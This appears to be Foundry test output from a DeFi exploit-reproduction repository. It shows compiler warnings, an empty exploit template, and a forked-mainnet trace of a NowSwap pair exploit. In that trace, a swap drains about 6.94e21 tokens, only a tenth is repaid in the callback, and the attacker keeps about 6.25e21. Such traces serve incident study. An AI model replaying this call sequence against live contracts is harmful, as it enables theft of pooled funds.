Compiling 20 files with Solc 0.8.10
Compiling 21 files with Solc 0.8.28
Solc 0.8.28 finished in 929.79ms
Solc 0.8.10 finished in 1.07s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 625.74ms (1.85ms CPU time)

Ran 1 test for src/test/2021-09/NowSwap_exp.sol:ContractTest
[PASS] testExploit() (gas: 145952)
Logs:
  Before exploiting 0
  After exploiting 6247523144463060082611

Traces:
  [5795] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 13225516 [1.322e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [151552] ContractTest::testExploit()
    ├─ [4817] 0xEB58343b36C7528F23CAAe63a150240241310049::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] console::log("Before exploiting", 0) [staticcall]
    │   └─ ← [Stop]
    ├─ [4817] 0xEB58343b36C7528F23CAAe63a150240241310049::balanceOf(0xA0Ff0e694275023f4986dC3CA12A6eb5D6056C62) [staticcall]
    │   └─ ← [Return] 7011810487612862045579 [7.011e21]
    ├─ [122440] 0xA0Ff0e694275023f4986dC3CA12A6eb5D6056C62::swap(0, 6941692382736733425123 [6.941e21], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000000001784f557b6fc1efcde3)
    │   ├─ [28498] 0xEB58343b36C7528F23CAAe63a150240241310049::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 6941692382736733425123 [6.941e21])
    │   │   ├─ emit Transfer(from: 0xA0Ff0e694275023f4986dC3CA12A6eb5D6056C62, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 6941692382736733425123 [6.941e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000001784f557b6fc1efcde3
    │   │   │   @ 0x910b008eff8f9b7933f00d4652ad30c1b13537d18a4609c56ca8861cf3b936e0: 0x00000000000000000000000000000000000000000000017c1c6b0851db2b1d8b → 0x000000000000000000000000000000000000000000000003cd158ce2193b4fa8
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─ [6814] ContractTest::fallback(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 6941692382736733425123 [6.941e21], 0x0000000000000000000000000000000000000000000001784f557b6fc1efcde3)
    │   │   ├─ [817] 0xEB58343b36C7528F23CAAe63a150240241310049::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 6941692382736733425123 [6.941e21]
    │   │   ├─ [3798] 0xEB58343b36C7528F23CAAe63a150240241310049::transfer(0xA0Ff0e694275023f4986dC3CA12A6eb5D6056C62, 694169238273673342512 [6.941e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xA0Ff0e694275023f4986dC3CA12A6eb5D6056C62, value: 694169238273673342512 [6.941e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000001784f557b6fc1efcde3 → 0x000000000000000000000000000000000000000000000152adccef17c8249fb3
    │   │   │   │   @ 0x910b008eff8f9b7933f00d4652ad30c1b13537d18a4609c56ca8861cf3b936e0: 0x000000000000000000000000000000000000000000000003cd158ce2193b4fa8 → 0x0000000000000000000000000000000000000000000000296e9e193a13067dd8
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   └─ ← [Stop]
    │   ├─ [2585] 0x0BCd83DF58a1BfD25b1347F9c9dA1b7118b648a6::balanceOf(0xA0Ff0e694275023f4986dC3CA12A6eb5D6056C62) [staticcall]
    │   │   └─ ← [Return] 272244859570035557 [2.722e17]
    │   ├─ [817] 0xEB58343b36C7528F23CAAe63a150240241310049::balanceOf(0xA0Ff0e694275023f4986dC3CA12A6eb5D6056C62) [staticcall]
    │   │   └─ ← [Return] 764287343149801962968 [7.642e20]
    │   ├─ [2413] 0x6a1a11e8224670186EB4B6DF9A47a204b616D675::nimbusReferralProgram() [staticcall]
    │   │   └─ ← [Return] 0x000000000000000000000000e5ad1a7c9ecfd77c856c211fd5df26a04a72c365
    │   ├─ [8598] 0xEB58343b36C7528F23CAAe63a150240241310049::transfer(0xe5AD1a7C9ecfd77C856c211Fd5df26a04a72c365, 1040728911997313410 [1.04e18])
    │   │   ├─ emit Transfer(from: 0xA0Ff0e694275023f4986dC3CA12A6eb5D6056C62, to: 0xe5AD1a7C9ecfd77C856c211Fd5df26a04a72c365, value: 1040728911997313410 [1.04e18])
    │   │   ├─  storage changes:
    │   │   │   @ 0x96ca51d649ba4fac90c06d4c820edf70b51bbd8caa27414fa5e753507abaa29b: 0x00000000000000000000000000000000000000000000081668bea511f0fb95b5 → 0x00000000000000000000000000000000000000000000081677300e80640fb737
    │   │   │   @ 0x910b008eff8f9b7933f00d4652ad30c1b13537d18a4609c56ca8861cf3b936e0: 0x0000000000000000000000000000000000000000000000296e9e193a13067dd8 → 0x000000000000000000000000000000000000000000000029602cafcb9ff25c56
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─ [24067] 0xe5AD1a7C9ecfd77C856c211Fd5df26a04a72c365::recordFee(0xEB58343b36C7528F23CAAe63a150240241310049, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1040728911997313410 [1.04e18])
    │   │   ├─ [2817] 0xEB58343b36C7528F23CAAe63a150240241310049::balanceOf(0xe5AD1a7C9ecfd77C856c211Fd5df26a04a72c365) [staticcall]
    │   │   │   └─ ← [Return] 38193348613012764735287 [3.819e22]
    │   │   ├─  storage changes:
    │   │   │   @ 0xee6d9ae70d99e55104e30f8231f97b8ea4adcea4a2b0628f7c1bd1d524cef293: 0x00000000000000000000000000000000000000000000081668bea511f0fb95b5 → 0x00000000000000000000000000000000000000000000081677300e80640fb737
    │   │   │   @ 0xeaebc58c7406849f4a8506155c78ef6bf9c9df0126a0ed16ef8b780d1e0c6134: 0x00000000000000000000000000000000000000000000068a0874bab3391a9cd5 → 0x00000000000000000000000000000000000000000000068a16e62421ac2ebe57
    │   │   └─ ← [Stop]
    │   ├─ emit Sync(reserve0: 272244859570035557 [2.722e17], reserve1: 764287343149801962968 [7.642e20])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 691737816840880980433 [6.917e20], amount0Out: 0, amount1Out: 6941692382736733425123 [6.941e21], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x610cfe7200000000017c3e292d3b0c0749ea00000000000003c73541e2991b65 → 0x6140ee4a0000000000296e9e193a13067dd800000000000003c73541e2991b65
    │   │   @ 9: 0x00000000000000000000000000111ee1645ce6f3df5baa589cc558dd420a6921 → 0x000000000000000000000000002589ef546a581f4e4241fe2d16c50b37910601
    │   │   @ 10: 0x000000000000000000000000000000001966e63a885f050b048e7f037ce4389e → 0x0000000000000000000000000000000019eb025207100e367fe4794e4aa8cea6
    │   │   @ 23: 0 → 1
    │   └─ ← [Stop]
    ├─ [817] 0xEB58343b36C7528F23CAAe63a150240241310049::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 6247523144463060082611 [6.247e21]
    ├─ [0] console::log("After exploiting", 6247523144463060082611 [6.247e21]) [staticcall]
    │   └─ ← [Stop]
    ├─  storage changes:
    │   @ 12: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 13.25s (11.44s CPU time)

Ran 2 test suites in 14.22s (13.88s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
